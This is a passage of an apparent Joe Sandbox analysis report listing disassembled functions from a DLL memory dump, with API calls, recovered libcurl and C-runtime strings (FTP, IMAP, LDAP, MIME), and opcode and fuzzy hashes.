                                                                                                                                  Function 6B8DB160 Relevance: 21.3, APIs: 14, Instructions: 267COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6B8F27F0: curl_slist_free_all.LIBCURL(?,?), ref: 6B8F2801
                                                                                                                                    • Part of subcall function 6B8F27F0: curl_slist_free_all.LIBCURL(?), ref: 6B8F2812
                                                                                                                                  • curl_mime_init.LIBCURL(?,?,?), ref: 6B8DB187
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_slist_free_all$curl_mime_init
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2112604817-0
                                                                                                                                  • Opcode ID: bc949395acadc5847afb11d0a10bff012655bda8de7bdce5ef64b7c672930832
                                                                                                                                  • Instruction ID: 81918a5c071dc200b7d59a5d44b36cc4b5ac5e7f8a7f42c97a32d3a14c77c185
                                                                                                                                  • Opcode Fuzzy Hash: bc949395acadc5847afb11d0a10bff012655bda8de7bdce5ef64b7c672930832
                                                                                                                                  • Instruction Fuzzy Hash: 39814576E04616ABCB158E68DC42B5B77E8EF04364F040EA6EC18A7341E73DED2593D1
                                                                                                                                  Function 6B8DBF20 Relevance: 19.6, APIs: 1, Strings: 10, Instructions: 383COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • curl_easy_strerror.LIBCURL(00000000), ref: 6B8DC103
                                                                                                                                  Strings
                                                                                                                                  • Remembering we are in dir "%s", xrefs: 6B8DC082
                                                                                                                                  • Uploaded unaligned file size (%I64d out of %I64d bytes), xrefs: 6B8DC382
                                                                                                                                  • No data was received!, xrefs: 6B8DC3FD
                                                                                                                                  • ABOR, xrefs: 6B8DC0E6
                                                                                                                                  • Exceeded storage allocation, xrefs: 6B8DC2B3
                                                                                                                                  • control connection looks dead, xrefs: 6B8DC20D
                                                                                                                                  • Failure sending ABOR command: %s, xrefs: 6B8DC109
                                                                                                                                  • partial download completed, closing connection, xrefs: 6B8DC25B
                                                                                                                                  • Received only partial file: %I64d bytes, xrefs: 6B8DC417
                                                                                                                                  • server did not report OK, got %d, xrefs: 6B8DC29E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_easy_strerror
                                                                                                                                  • String ID: ABOR$Exceeded storage allocation$Failure sending ABOR command: %s$No data was received!$Received only partial file: %I64d bytes$Remembering we are in dir "%s"$Uploaded unaligned file size (%I64d out of %I64d bytes)$control connection looks dead$partial download completed, closing connection$server did not report OK, got %d
                                                                                                                                  • API String ID: 1399792982-944385548
                                                                                                                                  • Opcode ID: e125c6dbb8e098f13c184d6a0dfc3ef0c1f70d7cb54297e8c93d8daf4f73ac5c
                                                                                                                                  • Instruction ID: 4c2205e48c1e1535ddb1eae6488c1c7a47e7dea576a7cc2202f5b2e223f4ae10
                                                                                                                                  • Opcode Fuzzy Hash: e125c6dbb8e098f13c184d6a0dfc3ef0c1f70d7cb54297e8c93d8daf4f73ac5c
                                                                                                                                  • Instruction Fuzzy Hash: E7E1F3759047449BEB11CF68C881B9A7BF5AF46324F184DEAE8589B283D73CD580CFA1
                                                                                                                                  Function 6B935D4F Relevance: 19.6, APIs: 13, Instructions: 88COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 6B935D6C
                                                                                                                                    • Part of subcall function 6B92F7EA: RtlFreeHeap.NTDLL(00000000,00000000,?,6B935EE0,6B9538A0,00000000,6B9538A0,00000000,?,6B935F07,6B9538A0,00000007,6B9538A0,?,6B93532A,6B9538A0), ref: 6B92F800
                                                                                                                                    • Part of subcall function 6B92F7EA: GetLastError.KERNEL32(6B9538A0,?,6B935EE0,6B9538A0,00000000,6B9538A0,00000000,?,6B935F07,6B9538A0,00000007,6B9538A0,?,6B93532A,6B9538A0,6B9538A0), ref: 6B92F812
                                                                                                                                  • _free.LIBCMT ref: 6B935D7E
                                                                                                                                  • _free.LIBCMT ref: 6B935D90
                                                                                                                                  • _free.LIBCMT ref: 6B935DA2
                                                                                                                                  • _free.LIBCMT ref: 6B935DB4
                                                                                                                                  • _free.LIBCMT ref: 6B935DC6
                                                                                                                                  • _free.LIBCMT ref: 6B935DD8
                                                                                                                                  • _free.LIBCMT ref: 6B935DEA
                                                                                                                                  • _free.LIBCMT ref: 6B935DFC
                                                                                                                                  • _free.LIBCMT ref: 6B935E0E
                                                                                                                                  • _free.LIBCMT ref: 6B935E20
                                                                                                                                  • _free.LIBCMT ref: 6B935E32
                                                                                                                                  • _free.LIBCMT ref: 6B935E44
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: 66a612039dbb34e06c3ac64e850d15d0d62f13e8b46396455eaae6526b2a2276
                                                                                                                                  • Instruction ID: fe844fdea9839ba9a4a9586ff23f7bfccb9eab0b957ca36abde289fa89082d6f
                                                                                                                                  • Opcode Fuzzy Hash: 66a612039dbb34e06c3ac64e850d15d0d62f13e8b46396455eaae6526b2a2276
                                                                                                                                  • Instruction Fuzzy Hash: F6215E32D48214EBCA14DE78F0D6D1F73EDBB1A31C360081AF1A9C7550CB38F88086A4
                                                                                                                                  Function 6B8F1A60 Relevance: 19.6, APIs: 5, Strings: 6, Instructions: 304COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8F1B58
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8F1B81
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8F1B95
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8F1C9F
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8F1D50
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ___from_strstr_to_strchr
                                                                                                                                  • String ID: LDAP$base$one$onetree$sub$subtree
                                                                                                                                  • API String ID: 601868998-884163498
                                                                                                                                  • Opcode ID: 5cc479e1f309c52ce2f079040b88e96ef7027e0cba527fcbe4c9ff8c72793cf0
                                                                                                                                  • Instruction ID: dda7382407e2d7185f7b7eeafd95fca6e893d626fc41d8badbcf8d9403e7e137
                                                                                                                                  • Opcode Fuzzy Hash: 5cc479e1f309c52ce2f079040b88e96ef7027e0cba527fcbe4c9ff8c72793cf0
                                                                                                                                  • Instruction Fuzzy Hash: 2BA1F9B5D00225AFEF01AF78DC41BAA7BB8EF06789F1004A5E914E7252E739D911C7A1
                                                                                                                                  Function 6B90ACC0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 141libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,?,00000002,6B90AEAE), ref: 6B90ACCE
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,LoadLibraryExA), ref: 6B90ACE8
                                                                                                                                  • _strpbrk.LIBCMT ref: 6B90ACFC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressHandleModuleProc_strpbrk
                                                                                                                                  • String ID: AddDllDirectory$LoadLibraryExA$kernel32
                                                                                                                                  • API String ID: 1657965159-3327535076
                                                                                                                                  • Opcode ID: e326ced33f09920138e912be764a09264a0783ed1b1256719346df1a4c8c0ac8
                                                                                                                                  • Instruction ID: d4ab1896d75f916ed7d2e94ae1f495ce004b9c33f55209c7fa1b99d629898fa7
                                                                                                                                  • Opcode Fuzzy Hash: e326ced33f09920138e912be764a09264a0783ed1b1256719346df1a4c8c0ac8
                                                                                                                                  • Instruction Fuzzy Hash: 03411D35708301ABEF105E789C457A9B76DDF47216F1081FEEC49D7201EE76C50546A0
                                                                                                                                  Function 6B935193 Relevance: 18.1, APIs: 12, Instructions: 113COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 6B9351CC
                                                                                                                                    • Part of subcall function 6B92F7EA: RtlFreeHeap.NTDLL(00000000,00000000,?,6B935EE0,6B9538A0,00000000,6B9538A0,00000000,?,6B935F07,6B9538A0,00000007,6B9538A0,?,6B93532A,6B9538A0), ref: 6B92F800
                                                                                                                                    • Part of subcall function 6B92F7EA: GetLastError.KERNEL32(6B9538A0,?,6B935EE0,6B9538A0,00000000,6B9538A0,00000000,?,6B935F07,6B9538A0,00000007,6B9538A0,?,6B93532A,6B9538A0,6B9538A0), ref: 6B92F812
                                                                                                                                    • Part of subcall function 6B935D4F: _free.LIBCMT ref: 6B935D6C
                                                                                                                                    • Part of subcall function 6B935D4F: _free.LIBCMT ref: 6B935D7E
                                                                                                                                    • Part of subcall function 6B935D4F: _free.LIBCMT ref: 6B935D90
                                                                                                                                    • Part of subcall function 6B935D4F: _free.LIBCMT ref: 6B935DA2
                                                                                                                                    • Part of subcall function 6B935D4F: _free.LIBCMT ref: 6B935DB4
                                                                                                                                    • Part of subcall function 6B935D4F: _free.LIBCMT ref: 6B935DC6
                                                                                                                                    • Part of subcall function 6B935D4F: _free.LIBCMT ref: 6B935DD8
                                                                                                                                    • Part of subcall function 6B935D4F: _free.LIBCMT ref: 6B935DEA
                                                                                                                                    • Part of subcall function 6B935D4F: _free.LIBCMT ref: 6B935DFC
                                                                                                                                    • Part of subcall function 6B935D4F: _free.LIBCMT ref: 6B935E0E
                                                                                                                                    • Part of subcall function 6B935D4F: _free.LIBCMT ref: 6B935E20
                                                                                                                                    • Part of subcall function 6B935D4F: _free.LIBCMT ref: 6B935E32
                                                                                                                                    • Part of subcall function 6B935D4F: _free.LIBCMT ref: 6B935E44
                                                                                                                                  • _free.LIBCMT ref: 6B9351EE
                                                                                                                                  • _free.LIBCMT ref: 6B935203
                                                                                                                                  • _free.LIBCMT ref: 6B93520E
                                                                                                                                  • _free.LIBCMT ref: 6B935230
                                                                                                                                  • _free.LIBCMT ref: 6B935243
                                                                                                                                  • _free.LIBCMT ref: 6B935251
                                                                                                                                  • _free.LIBCMT ref: 6B93525C
                                                                                                                                  • _free.LIBCMT ref: 6B935294
                                                                                                                                  • _free.LIBCMT ref: 6B93529B
                                                                                                                                  • _free.LIBCMT ref: 6B9352B8
                                                                                                                                  • _free.LIBCMT ref: 6B9352D0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: 97b3ee0179c277598029a80490da34b7d1e891520507ab327ae5041052e49f57
                                                                                                                                  • Instruction ID: 1f5a9a4aa6890e2650b3f63fd2995391c1b72aac72577e297096abfcc0a82966
                                                                                                                                  • Opcode Fuzzy Hash: 97b3ee0179c277598029a80490da34b7d1e891520507ab327ae5041052e49f57
                                                                                                                                  • Instruction Fuzzy Hash: FE315E31E143119FFB219A79E885B5A73EDFF14318F10449AE569D7164DF78E940CB20
                                                                                                                                  Function 6B92D7CA Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6B92D46B: CreateFileW.KERNEL32(00000000,00000000,?,6B92D873,?,?,00000000,?,6B92D873,00000000,0000000C), ref: 6B92D488
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6B92D8DE
                                                                                                                                  • __dosmaperr.LIBCMT ref: 6B92D8E5
                                                                                                                                  • GetFileType.KERNEL32(00000000), ref: 6B92D8F1
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6B92D8FB
                                                                                                                                  • __dosmaperr.LIBCMT ref: 6B92D904
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6B92D924
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 6B92DA71
                                                                                                                                  • GetLastError.KERNEL32 ref: 6B92DAA3
                                                                                                                                  • __dosmaperr.LIBCMT ref: 6B92DAAA
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                  • String ID: H
                                                                                                                                  • API String ID: 4237864984-2852464175
                                                                                                                                  • Opcode ID: acb4c4ef0b22552c8bd1a25cac0f84b8bbdbf9b939da1117353422959b22b235
                                                                                                                                  • Instruction ID: 64078dfe601e2ffd79c8f784ea4ab44064e7bd9ed16eeb7ebfc0d31009eddaa2
                                                                                                                                  • Opcode Fuzzy Hash: acb4c4ef0b22552c8bd1a25cac0f84b8bbdbf9b939da1117353422959b22b235
                                                                                                                                  • Instruction Fuzzy Hash: ABA12232E681549FCF199F78C852BAE3BB4AF0B328F14019DE811AB395C739D816CB51
                                                                                                                                  Function 6B8DDBC0 Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 186COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000018,%04d%02d%02d %02d:%02d:%02d GMT,?,?,?,?,?,?), ref: 6B8DDC9D
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000080,Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT,?,?,?,?,?,?), ref: 6B8DDD74
                                                                                                                                    • Part of subcall function 6B9006B0: curl_mvsnprintf.LIBCURL(?,00000801,00000000,6B8F6C24), ref: 6B9006EF
                                                                                                                                    • Part of subcall function 6B9006B0: curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B90072F
                                                                                                                                  Strings
                                                                                                                                  • %04d%02d%02d %02d:%02d:%02d GMT, xrefs: 6B8DDC95
                                                                                                                                  • %04d%02d%02d%02d%02d%02d, xrefs: 6B8DDC58
                                                                                                                                  • Given file does not exist, xrefs: 6B8DDC0D
                                                                                                                                  • unsupported MDTM reply format, xrefs: 6B8DDBFA
                                                                                                                                  • Skipping time comparison, xrefs: 6B8DDE44
                                                                                                                                  • The requested document is not new enough, xrefs: 6B8DDDF0
                                                                                                                                  • Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT, xrefs: 6B8DDD69
                                                                                                                                  • The requested document is not old enough, xrefs: 6B8DDE3D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_msnprintf$curl_mvsnprintf
                                                                                                                                  • String ID: %04d%02d%02d %02d:%02d:%02d GMT$%04d%02d%02d%02d%02d%02d$Given file does not exist$Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT$Skipping time comparison$The requested document is not new enough$The requested document is not old enough$unsupported MDTM reply format
                                                                                                                                  • API String ID: 405648482-226030088
                                                                                                                                  • Opcode ID: b67529524d931037d1ed1d1bfa3dc473165b4f2777e9aab35466e8112b5def07
                                                                                                                                  • Instruction ID: b0fb8c968099cde47b1a3e92bddddcd1e84ec246b9f1b4c50aa5333dbcfc8a72
                                                                                                                                  • Opcode Fuzzy Hash: b67529524d931037d1ed1d1bfa3dc473165b4f2777e9aab35466e8112b5def07
                                                                                                                                  • Instruction Fuzzy Hash: C861A176940718ABDF20CA74CC81FDAB7B9AF55304F0048DAE95DE7201EB39AA44CF61
                                                                                                                                  Function 6B8FD9D0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 144COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FDA0F
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FDA4D
                                                                                                                                  • curl_msnprintf.LIBCURL(6B8E1696,00000009,%2I64d:%02I64d:%02I64d,6B8E1696,?,00000000,?,?,6B8E1696,?,6B8E1696,0000003C,00000000,00000000,?,00000E10), ref: 6B8FDAA5
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FDABD
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FDAF2
                                                                                                                                  • curl_msnprintf.LIBCURL(6B8E1696,00000009,%3I64dd %02I64dh,00000000,6B8E1696,00000000,?,?,6B8E1696,00000E10,00000000,00000000,?,00015180,00000000,?), ref: 6B8FDB07
                                                                                                                                  • curl_msnprintf.LIBCURL(6B8E1696,00000009,%7I64dd,00000000,?,?,6B8E1696,00015180,00000000,?,6B8E1696,00000E10,00000000,?,6B8E1696,?), ref: 6B8FDB22
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$curl_msnprintf
                                                                                                                                  • String ID: %2I64d:%02I64d:%02I64d$%3I64dd %02I64dh$%7I64dd
                                                                                                                                  • API String ID: 2752550610-564197712
                                                                                                                                  • Opcode ID: 0de82e7e7c3722a30bbf37d4b43ed963a05112e361f7b5b5f757d19201d054a8
                                                                                                                                  • Instruction ID: 179454ddccb9cf6a1e263ab63e206e8ac4a1cae12f101591db9fed5aa2c86974
                                                                                                                                  • Opcode Fuzzy Hash: 0de82e7e7c3722a30bbf37d4b43ed963a05112e361f7b5b5f757d19201d054a8
                                                                                                                                  • Instruction Fuzzy Hash: 8F414473B802187AEB204D7C8C51FAEBBADDBD4694F050575FE08EB290E675DD1283A0
                                                                                                                                  Function 6B92F3F7 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 6B92F40D
                                                                                                                                    • Part of subcall function 6B92F7EA: RtlFreeHeap.NTDLL(00000000,00000000,?,6B935EE0,6B9538A0,00000000,6B9538A0,00000000,?,6B935F07,6B9538A0,00000007,6B9538A0,?,6B93532A,6B9538A0), ref: 6B92F800
                                                                                                                                    • Part of subcall function 6B92F7EA: GetLastError.KERNEL32(6B9538A0,?,6B935EE0,6B9538A0,00000000,6B9538A0,00000000,?,6B935F07,6B9538A0,00000007,6B9538A0,?,6B93532A,6B9538A0,6B9538A0), ref: 6B92F812
                                                                                                                                  • _free.LIBCMT ref: 6B92F419
                                                                                                                                  • _free.LIBCMT ref: 6B92F424
                                                                                                                                  • _free.LIBCMT ref: 6B92F42F
                                                                                                                                  • _free.LIBCMT ref: 6B92F43A
                                                                                                                                  • _free.LIBCMT ref: 6B92F445
                                                                                                                                  • _free.LIBCMT ref: 6B92F450
                                                                                                                                  • _free.LIBCMT ref: 6B92F45B
                                                                                                                                  • _free.LIBCMT ref: 6B92F466
                                                                                                                                  • _free.LIBCMT ref: 6B92F474
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: 6ba362d1c33963b78e6bcd553cb6be4a024a08be46f43a326bfe328e5bad686c
                                                                                                                                  • Instruction ID: 405518c592e1f54a98479a333393addb2f34109678ebe8e2c0f244f1582b36a2
                                                                                                                                  • Opcode Fuzzy Hash: 6ba362d1c33963b78e6bcd553cb6be4a024a08be46f43a326bfe328e5bad686c
                                                                                                                                  • Instruction Fuzzy Hash: 7821A47AD10108AFDB41DFB4D8A1EDE7BB9FF18248F0081A6F5159B125EB35EA45CB80
                                                                                                                                  Function 6B8F00B0 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 264COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  • SELECT %s, xrefs: 6B8F022F
                                                                                                                                  • Mime-Version, xrefs: 6B8F02C9
                                                                                                                                  • Cannot SELECT without a mailbox., xrefs: 6B8F01F2
                                                                                                                                  • Cannot APPEND without a mailbox., xrefs: 6B8F026C
                                                                                                                                  • Mime-Version: 1.0, xrefs: 6B8F02E1
                                                                                                                                  • Cannot APPEND with unknown input file size, xrefs: 6B8F0354
                                                                                                                                  • APPEND %s (\Seen) {%I64d}, xrefs: 6B8F0395
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: APPEND %s (\Seen) {%I64d}$Cannot APPEND with unknown input file size$Cannot APPEND without a mailbox.$Cannot SELECT without a mailbox.$Mime-Version$Mime-Version: 1.0$SELECT %s
                                                                                                                                  • API String ID: 0-2877092315
                                                                                                                                  • Opcode ID: 2637eb328f9a31fe0cd347dad4c9f563f9ff31facdd2029010169c1240b057fd
                                                                                                                                  • Instruction ID: c6a9611d5cd58cc3a6c9bec2c76ec9816e569d3968fe5f9af1a40337bdfc2cca
                                                                                                                                  • Opcode Fuzzy Hash: 2637eb328f9a31fe0cd347dad4c9f563f9ff31facdd2029010169c1240b057fd
